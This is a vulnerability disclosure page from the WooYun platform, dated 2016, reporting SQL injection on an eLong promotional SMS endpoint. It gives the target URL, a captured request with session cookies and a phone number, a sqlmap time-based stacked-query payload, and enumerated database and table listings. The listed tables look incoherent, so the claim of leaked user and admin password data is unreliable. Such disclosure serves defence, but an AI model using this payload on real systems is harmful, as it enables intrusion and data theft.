艺龙某站存在SQL注入两库170张表涉及用户表/管理员密码等

  • A+
所属分类:乌云漏洞
摘要

2016-03-14: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向核心白帽子及相关领域专家公开
2016-04-05: 细节向普通白帽子公开
2016-04-15: 细节向实习白帽子公开
2016-04-30: 细节向公众公开

漏洞概要 关注数(8) 关注此漏洞

缺陷编号: WooYun-2016-184247

漏洞标题: 艺龙某站存在SQL注入两库170张表涉及用户表/管理员密码等

相关厂商: 艺龙旅行网

漏洞作者: hear7v

提交时间: 2016-03-14 09:54

公开时间: 2016-04-30 13:52

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: sql注入

0人收藏

漏洞详情

披露状态:

2016-03-14: 细节已通知厂商并且等待厂商处理中
2016-03-16: 厂商已经确认,细节仅向厂商公开
2016-03-26: 细节向核心白帽子及相关领域专家公开
2016-04-05: 细节向普通白帽子公开
2016-04-15: 细节向实习白帽子公开
2016-04-30: 细节向公众公开

简要描述:

好久没来wooyun交洞了,艺龙某站存在sql注入,两库170张表,大量用户信息,管理员密码等信息泄露,给个首页呗

详细说明:

{"target": "http://mhuodong.elong.com/PromotionJson/GetSmsCode", "agent": "Mozilla/5.0 (Linux; Android 4.4.4; HUAWEI ALE-CL00 Build/HuaweiALE-CL00) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36 ewandroid/9.9.1", "referer": null, "report": "", "cookie": "H5SessionId=3dbcc29e-c256-4234-8570-eda034ce26cc; H5Channel=ewhtml5%2cDefault; H5CookieId_s=e924cf81-2df0-4bfa-8571-8a6d99bfd0be; H5CookieId=e924cf81-2df0-4bfa-8571-8a6d99bfd0be; route=b0c9360f937aba159859a160623bc8de; Hm_lvt_a6bc45911d1a6843649fb7ba8676cc71=1457837385; Hm_lpvt_a6bc45911d1a6843649fb7ba8676cc71=1457837385; Hm_lvt_2547ead1439a4e1d06c7eb9e330939fd=1457837386; Hm_lpvt_2547ead1439a4e1d06c7eb9e330939fd=1457837386; NSC_NCBQQEXOME_80=ffffffffaf1d13b445525d5f4f58455e445a4a4229a0", "data": "activityId=65698945-4ed7-4e70-9078-fae5a80c78fe&mobile=18980144019&gCode="}

漏洞证明:

sqlmap identified the following injection point(s) with a total of 239 HTTP(s) requests:

---

Parameter: activityId (POST)

Type: stacked queries

Title: MySQL > 5.0.11 stacked queries (SELECT - comment)

Payload: activityId=65698945-4ed7-4e70-9078-fae5a80c78fe';(SELECT * FROM (SELECT(SLEEP(5)))gbhk)#&mobile=18980144019&gCode=

---

back-end DBMS: MySQL 5.0.11

sqlmap resumed the following injection point(s) from stored session:

---

Parameter: activityId (POST)

Type: stacked queries

Title: MySQL > 5.0.11 stacked queries (SELECT - comment)

Payload: activityId=65698945-4ed7-4e70-9078-fae5a80c78fe';(SELECT * FROM (SELECT(SLEEP(5)))gbhk)#&mobile=18980144019&gCode=

---

back-end DBMS: MySQL 5.0.11

available databases [3]:

[*] information_schema

[*] test

[*] weixinpacket

Database: test

[163 tables]

+-----------------------------+

| BDDJoueurs |

| Booked_On |

| Campus |

| CodeRuleType |

| DEPARTAMENTO |

| DWE_Predecessors |

| D_Abbreviation |

| D_EM_DESTINATARIO |

| D_Format_Data |

| Descriptions_Languages |

| EMPLEADO |

| Equipment |

| LT_CUSTOM1 |

| LT_CUSTOM2 |

| LT_CUSTOM3 |

| LT_CUSTOM4 |

| LT_GRUPO |

| MM_USUARIOS_DO_PROCESSO |

| Model |

| POINT |

| Parametre |

| PostalAddress |

| Propdesc_table |

| Property |

| RATING |

| ROLE_PERM |

| SYNALLAGI |

| S_SESSOES |

| StateType |

| Station_Data |

| THOT_YEAR |

| UM_ROLE_ATTRIBUTES |

| Users |

| null |

| size |

| access_control |

| account_multi |

| account_transaction |

| accountuser |

| acctmanager |

| actualites |

| admin_psw |

| artikel_variationsgruppen |

| basePlusCommissionEmployees |

| binn_articles |

| binn_bann_temps |

| binn_catlinks |

| binn_cform_settings |

| binn_docs_temps |

| binn_faq_temps |

| binn_forum_threads |

| binn_news |

| binn_rubrikator_tlevel |

| binn_system_messages |

| binn_vote_results |

| cdb_announcements |

| cdb_attachments |

| cdb_banned |

| cdb_debates |

| cdv_curated_allele |

| cocktail_person |

| combustiblebois |

| connections |

| contador_empresa |

| convite |

| copytest |

| curso |

| dados_familia |

| dados_prefeitura |

| decodifica_tabelle |

| despesa_familia |

| div_treatment |

| dtb_bat_order_daily_age |

| dtb_send_customer |

| economy |

| email |

| emailinfo |

| enrolls |

| ew_gruppi |

| ezsearch_return_count_new |

| ezsearch_search_phrase_new |

| f_spatialcontext |

| files |

| forum_user_stat |

| gd |

| geo_lake |

| gl |

| greylist |

| hardware |

| house_extensions |

| ibf_members |

| images |

| instituicao |

| ippaths |

| jforum_posts |

| jforum_ranks |

| jiveID |

| jos_polls |

| jos_respuestas |

| jos_vm_orders |

| kauf_artikel |

| kontakt |

| logradouro |

| m_data |

| mehrwertsteuer |

| mein_doc |

| mtb_zip |

| mymps_certification |

| mymps_member_tpl |

| mymps_upload |

| nuke_journal |

| nuke_links_categories |

| nuke_message |

| nuke_related |

| nuke_topics |

| nuke_users_temp |

| officer |

| osc_products |

| partsgroup |

| perfil |

| photo |

| phpbb_confirm |

| phpbb_search_results |

| phpbb_themes_name |

| pictures |

| post |

| pricegroup |

| problem |

| queue_info |

| redirect |

| reserve |

| riddles |

| routerbenchmarks |

| serie |

| site_environment |

| site_location |

| soc_da_polit_ge |

| software |

| spip_articles |

| spip_mots_documents |

| studierende |

| sysmaps |

| sysmergeschemaarticles |

| tb_username |

| tbadmins |

| tblStones |

| tblmanagers |

| templatelinks |

| tf_rss |

| tmp |

| topic |

| trackbacks |

| trivia |

| ts2_server_privileges |

| tt_address |

| tx_tcdirectmail_targets |

| user_preferences |

| user_rights |

| valhalla |

| verkaeufer |

| webcal_group_user |

| zl_baoming |

| zl_finance |

+-----------------------------+

Database: weixinpacket

[9 tables]

+---------------------+

| dictionary |

| ew_moduli |

| imageAttribute |

| iplinks |

| maxcodevento |

| phpbb_themes |

| rating_track |

| reciprocal_admin |

| vrls_listing_images |

+---------------------+

back-end DBMS: MySQL 5.0.11

Database: test

Table: users

[14 columns]

+----------------------------+---------+

| Column | Type |

+----------------------------+---------+

| caroline-du-nord | numeric |

| adminpass | numeric |

| fldfuntype | numeric |

| id_refferer | numeric |

| idricoverohatipologia | numeric |

| mod_virtuemart_featureprod | numeric |

| shared_secret | numeric |

| sub | numeric |

| sub_comment1 | numeric |

| sub_comment5 | numeric |

| tutor | numeric |

| uname | numeric |

| version_min | numeric |

| zid | numeric |

+----------------------------+---------+

修复方案:

过滤

版权声明:转载请注明来源 hear7v@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-03-16 13:52

厂商回复:

已验证,感谢白帽子!

最新状态:

暂无


 

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

 

登陆后才能进行评分


评价

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: